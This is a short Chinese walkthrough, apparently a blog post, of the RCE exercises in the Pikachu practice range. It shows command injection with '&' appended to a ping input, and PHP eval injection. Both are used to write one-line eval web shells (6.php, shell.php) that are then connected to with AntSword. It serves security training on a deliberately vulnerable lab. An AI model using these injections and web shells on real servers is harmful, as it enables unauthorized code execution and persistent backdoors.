Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
hunter145013 小时前
Linux 进程与计划任务
linux·运维·服务器
楼田莉子13 小时前
Linux学习之磁盘与Ext系列文件
linux·运维·服务器·c语言·学习
陌上花开缓缓归以13 小时前
linux 怎么模拟系统panic重启
linux·运维·服务器
月白风清江有声14 小时前
vscode使用git
linux·运维·服务器
开开心心_Every15 小时前
免费窗口置顶小工具:支持多窗口置顶操作
服务器·前端·学习·macos·edge·powerpoint·phpstorm
haluhalu.16 小时前
深入理解Linux线程机制:线程概念,内存管理
java·linux·运维
吉吉6116 小时前
浅谈文件包含之伪协议
安全·web安全
cui__OaO16 小时前
Linux驱动--驱动编译
linux·运维·服务器
吗喽15434518816 小时前
渗透高级第一次作业(笔记整理)
笔记·安全·网络安全
Jerry_Gao92117 小时前
【成长笔记】【web安全】深入Web安全与PHP底层:四天实战课程笔记
笔记·安全·web安全·php·漏洞